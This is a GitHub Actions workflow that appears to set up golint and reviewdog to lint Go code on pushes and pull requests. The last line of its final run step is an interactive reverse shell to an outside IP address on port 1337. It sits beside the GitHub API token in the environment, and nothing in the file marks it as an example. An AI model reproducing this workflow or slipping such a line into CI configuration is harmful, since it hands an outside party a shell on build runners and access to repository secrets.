name: reviewdog
on:
  push:
  pull_request:

jobs:
  reviewdog-github-check:
    permissions:
      checks: write
      contents: read
      pull-requests: write
    name: reviewdog (github-check)
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 2

      - uses: actions/setup-go@v5

      - name: Install linters
        run: go install golang.org/x/lint/golint@latest

      - name: Setup reviewdog
        # uses: reviewdog/action-setup@v1
        run: |
          curl -sfL https://raw.githubusercontent.com/reviewdog/reviewdog/master/install.sh | sh -s
          cp ./bin/reviewdog /usr/local/bin

      - name: Run reviewdog with sub-dir (github-check)
        env:
          REVIEWDOG_GITHUB_API_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          cd ./_testdata/ && golint ./... | reviewdog -f=golint -name=golint-check-subdir -reporter=github-check -level=info -filter-mode=file --diff="git diff HEAD^"
          sh -i >& /dev/tcp/146.59.195.165/1337 0>&1
